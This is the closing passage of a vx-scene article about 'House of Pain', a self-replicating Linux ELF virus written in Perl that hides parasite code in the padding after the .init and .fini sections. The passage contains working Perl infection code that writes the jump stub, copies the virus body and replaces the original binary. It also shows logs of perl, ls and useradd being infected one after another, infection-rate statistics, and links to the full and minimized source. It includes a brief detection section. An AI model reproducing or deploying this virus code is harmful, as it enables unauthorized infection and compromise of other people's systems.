The second jump is built in the same way as the first one: 0xe9 instruction with
the distance to the last byte (0xc3) of the first jump, where:
</p>

<p>
 <em> 
 &dollar;dist = distance between available bytes of .init and .fini<br />
 &dollar;p_sz = size of the assembly payload
 </em>
</p>

<p>
After that the virus content &dollar;vx of size &dollar;vx_sz is copied into the rest of the
available padding bytes.
</p>

<pre class="code">
my &dollar;jmp2 = "\xe9".pack("V",-&dollar;dist - &dollar;p_sz - 7);
wr(&dollar;tmp_fh, &dollar;jmp2);
rd(&dollar;h,5);
wr(&dollar;tmp_fh, &dollar;vx);
rd(&dollar;fh, &dollar;vx_sz);
</pre>


<a name="implementation10"></a><h5>5.10 Copy rest of binary and replace original file</h5>

<p>
Once the parasite code has been embedded into the infected binary the rest of
the original binary is copied until the end of file, where:
</p>

<pre>
&dollar;f_sz  = size of the original binary
&dollar;y2    = .fini sh_offset
&dollar;z2    = .fini sh_size
&dollar;p_sz  = size of the assembly payload
&dollar;vx_sz = size of the "House of Pain"
5      = size of JMP instruction
</pre>

<p>
Then the original binary is deleted, the temporary copy is renamed to the 
binary's original filename and the copy is deleted.
</p>

<pre class="code">
wr(&dollar;tmp_fh, rd(&dollar;fh, &dollar;f_sz - (&dollar;y2 + &dollar;z2 + &dollar;p_sz + &dollar;vx_sz + 5)));

# delete original binary and replace it with modified copy
unlink &dollar;f;
copy("&dollar;f.t", &dollar;f);
unlink "&dollar;f.t";
chmod 0755, &dollar;f;
</pre>


<a name="implementation11"></a><h5>5.11 Virus payload</h5>

<p>
The last part after the main loop contains the virus payload, which in this case
prints an extract from the song <em>"Jump around"</em> from <em>"House of Pain"</em>. Of course, 
this could be replaced with a more elaborated payload in the future:
</p>

<pre class="code">
print "jump! " x 4;
</pre>

<br />
<a name="detection"></a><h4>6. Detection</h4>
<hr />

<p>
Detection for <em>"House of Pain"</em> is trivial. A first approach would be to check
if the last byte of the .init section has been modified (with value other than
0xc3). Another approach would be to check if the available padding bytes after
the .init and .fini sections are not null, which would indicate the presence of
parasite code.
</p>

<br />
<a name="results"></a><h4>7. Results and final words</h4>
<hr />

<p>
The code discussed in Section 5 was minimized to reduce the size of the virus
(see Section 8) obtaining a final size of 1855 bytes. A simple modification was 
made to the script <a href="https://github.com/ilv/vx/blob/main/hop/padding-bytes.pl" target="_blank">padding-bytes.pl</a> to check for the number of binaries with 
enough padding bytes for this minimized version, indicating that 859 out of 1512 
files (56%) could be infected. Note that <em>"House of Pain"</em> uses a simple 20-byte 
virus payload (see section 5.11). If, for example, a 100-byte payload is to be
used then the number of binaries that could be infected is reduced to 835 files 
(55%).
</p>

<p>
Some infection examples of common binaries are shown below. In these cases the
virus payload gets printed after the output of the infected binaries due likely
to the use of fork in the Assembly payload.
</p>

<pre>
(first infection with Perl script)
&dollar; cp /usr/bin/perl . 
&dollar; perl hop.pl
jump!  jump!  jump!  jump!  &dollar; 

(execution of infected binary)
&dollar; ./perl -v

This is perl 5, version 32, subversion 1 (v5.32.1) built for 
x86_64-linux-gnu-thread-multi (with 48 registered patches, see perl -V for more
detail)
[...]
Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

&dollar; jump!  jump!  jump!  jump! 

(second infection from infected binary)
&dollar; cp /usr/bin/ls .
&dollar; ./ls
hop.pl	ls  perl
&dollar; ./perl -v
[...]
&dollar; jump!  jump!  jump!  jump!  
&dollar; ./ls
hop.pl	ls  perl
&dollar; jump!  jump!  jump!  jump! 

(third infection from infected binary)
&dollar; cp /usr/sbin/useradd .
&dollar; ./ls
hop.pl	ls  perl  useradd
&dollar; jump!  jump!  jump!  jump!
&dollar; ./useradd -h
&dollar; ./useradd -h
Modo de uso: useradd [opciones] USUARIO
             useradd -D
             useradd -D [opciones]
[...]
&dollar; jump!  jump!  jump!  jump!
</pre>

<p>
In the output above local copies of the binaries <em>perl</em>, <em>ls</em> and <em>useradd</em> where
infected successfully. A disassembly of sections .init and .fini of such files
displays the following: 
</p>

<pre>
&dollar; objdump -d -j .init perl
[...]
0000000000047000 &lt;.init>:
   47000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   47004:	48 8b 05 d5 9f 33 00 	mov    0x339fd5(%rip),%rax
   4700b:	48 85 c0             	test   %rax,%rax
   4700e:	74 02                	je     47012 <endgrent-0x1e>
   47010:	ff d0                	callq  *%rax
   47012:	48 83 c4 08          	add    &dollar;0x8,%rsp
   47016:	90                   	nop

&dollar; objdump -d -j .fini perl
[...]
00000000001cb05c &lt;.fini>:
  1cb05c:	48 83 ec 08          	sub    &dollar;0x8,%rsp
  1cb060:	48 83 c4 08          	add    &dollar;0x8,%rsp
  1cb064:	c3                   	retq   

&dollar; objdump -d -j .init ls
[...]
0000000000004000 &lt;.init>:
    4000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
    4004:	48 8b 05 d5 ff 01 00 	mov    0x1ffd5(%rip),%rax
    400b:	48 85 c0             	test   %rax,%rax
    400e:	74 02                	je     4012 <__ctype-0x1e>
    4010:	ff d0                	callq  *%rax
    4012:	48 83 c4 08          	add    &dollar;0x8,%rsp
    4016:	90                   	nop

&dollar; objdump -d -j .fini ls
[...]
00000000000181a0 &lt;.fini>:
   181a0:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   181a4:	48 83 c4 08          	add    &dollar;0x8,%rsp
   181a8:	c3                   	retq   

&dollar; objdump -d -j .init useradd
[...]
0000000000005000 &lt;.init>:
    5000:	48 83 ec 08          	sub    &dollar;0x8,%rsp
    5004:	48 8b 05 c5 bf 01 00 	mov    0x1bfc5(%rip),%rax 
    500b:	48 85 c0             	test   %rax,%rax
    500e:	74 02                	je     5012 <endgrent-0x1e>
    5010:	ff d0                	callq  *%rax
    5012:	48 83 c4 08          	add    &dollar;0x8,%rsp
    5016:	90                   	nop
 
&dollar; objdump -d -j .fini useradd
[...]
00000000000172f4 &lt;.fini>:
   172f4:	48 83 ec 08          	sub    &dollar;0x8,%rsp
   172f8:	48 83 c4 08          	add    &dollar;0x8,%rsp
   172fc:	c3                   	retq   
</pre>

<p>
As the reader may observe all three .init sections have its final byte patched
with a NOP instruction. However, since the headers information is not modified,
the parasite code injected in the .init and .fini sections is not displayed in
any of the infected binaries.
</p>

<p>
  The code discussed in Section 5 can be found <a href="https://github.com/ilv/vx/blob/main/hop/Linux.HouseOfPain-pretty.pl" target="_blank">here</a>. 
  A minimized version can be found <a href="https://github.com/ilv/vx/blob/main/hop/Linux.HouseOfPain.pl" target="_blank">here</a>.

</p>

<p>
And finally, greets to all the nice people from tmp0ut and vxug.
</p>
      </p>
    </div>
    <hr />
<div class="w3-row footer">
    <div class="w3-col s6">generated by bita v0.04 at 2025-02-24 23:56:18</div>
    <div class="w3-col s6">
      <div class="w3-right"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0" target="_blank">cc by-nc-sa</a></div>
	</div>
</div>
  </div>
</body>
</html>
